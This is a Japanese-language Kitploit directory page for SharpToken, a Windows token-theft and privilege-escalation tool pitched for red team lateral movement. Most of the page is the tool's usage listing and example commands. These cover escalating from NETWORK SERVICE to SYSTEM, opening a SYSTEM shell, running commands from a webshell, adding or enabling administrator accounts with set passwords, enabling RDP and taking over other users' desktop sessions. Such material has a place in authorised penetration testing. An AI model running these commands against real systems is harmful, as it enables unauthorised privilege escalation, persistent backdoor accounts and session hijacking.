Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
SharpToken — プロセスから漏洩したトークンを盗み取り、SYSTEMレベルのアクセス、ユーザー偽装、パスワードなしでのデスクトップ切り替えを可能にするWindowsトークン窃取および権限昇格ツール。 | Kitploit
ツール/GitHubGitHub/beichendream/sharptoken
特権昇格横移動ポストエクスプロイトレッドチーミング
GitHubbeichendream/sharptoken

SharpToken

プロセスから漏洩したトークンを盗み取り、SYSTEMレベルのアクセス、ユーザー偽装、パスワードなしでのデスクトップ切り替えを可能にするWindowsトークン窃取および権限昇格ツール。

リポジトリを見る
496682年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

SharpToken

Red team の横方向移動中、私たちはしばしば他のユーザーの権限を奪取する必要があります。現代の EDR の防御下では、Mimikatz を使用して他のユーザー権限を取得することは困難であり、対象ユーザーにアクティブなプロセスが存在しない場合、"OpenProcessToken" を使用してトークンを盗むことはできません。

SharpToken は、トークン漏洩を悪用するためのツールです。システム上のすべてのプロセスから漏洩したトークンを見つけて使用できます。もしあなたが低権限のサービスユーザーであれば、これを使用して "NT AUTHORITY\SYSTEM" 権限に昇格することもでき、対象ユーザーのパスワードを必要とせずに、対象ユーザーのデスクトップに切り替えてさらに操作を行うことができます。.。

image

使用法

root@kitploit:~
SharpToken By BeichenDream
=========================================================

Github : https://github.com/BeichenDream/SharpToken

If you are an NT AUTHORITY\NETWORK SERVICE user then you just need to add the bypass parameter to become an NT AUTHORIT\YSYSTEM
e.g.
SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami" bypass


Usage:

SharpToken COMMAND arguments



COMMANDS:

        list_token [process pid]        [bypass]

        list_all_token [process pid] [bypass]

        add_user    <username> <password> [group] [domain] [bypass]

        enableUser <username> <NewPassword> [NewGroup] [bypass]

        delete_user <username> [domain] [bypass]

        execute <tokenUser> <commandLine> [Interactive] [bypass]

        enableRDP [bypass]

        tscon <targetSessionId> [sourceSessionId] [bypass]


example:
    SharpToken list_token
    SharpToken list_token bypass
    SharpToken list_token 6543
    SharpToken add_user admin Abcd1234! Administrators
    SharpToken enableUser Guest Abcd1234! Administrators
    SharpToken delete_user admin
    SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami"
    SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami" bypass
    SharpToken execute "NT AUTHORITY\SYSTEM" cmd true
    SharpToken execute "NT AUTHORITY\SYSTEM" cmd true bypass
    SharpToken tscon 1




昇格された権限

通常のトークン窃取による権限昇格に加えて、SharpToken は Bypass を介して完全性のあるトークンを取得することもサポートしています。

もしあなたが NT AUTHORITY/NETWORK SERVICE ユーザーで、bypass パラメータを追加すると、SharpToken は RPCSS から System を盗みます。つまり、無条件に NT AUTHORITY\NETWORK SERVICE から NT AUTHORITY\SYSTEM への昇格が行われます。

image

リストトークン

列挙される情報には、SID、LogonDomain、UserName、Session、LogonType、TokenType、TokenHandle(Duplicate 後のトークンのハンドル)、TargetProcessId(トークンが由来するプロセス)、TargetProcessToken(ソースプロセス内のトークンのハンドル)、Groups(トークンユーザーが属するグループ)が含まれます。

root@kitploit:~
SharpToken list_token

image

指定されたプロセスからトークンを列挙

root@kitploit:~
SharpToken list_token 468

image

対話型シェルを取得

root@kitploit:~
execute "NT AUTHORITY\SYSTEM" cmd true

image

コマンド実行結果を取得(ウェブシェルで実行)

root@kitploit:~
SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami"

image

盗んだトークンで管理者ユーザーを作成

root@kitploit:~

SharpToken add_user admin Abcd1234! Administrators

盗んだトークンで管理者ユーザーを有効化

root@kitploit:~
    SharpToken enableUser Guest Abcd1234! Administrators

盗んだトークンでユーザーを削除

root@kitploit:~
    SharpToken delete_user admin

盗んだトークンでターゲットのデスクトップに切り替え

1 はターゲットユーザーのデスクトップ、2 は受け取り側のデスクトップです。

root@kitploit:~
    SharpToken tscon 1 2

ライセンス

GNU General Public License

参照

https://www.tiraniddo.dev/2020/04/sharing-logon-session-little-too-much.html

https://github.com/decoder-it/NetworkServiceExploit

https://github.com/FSecureLABS/incognito

https://github.com/chroblert/JCTokenUtil

ツールをダウンロード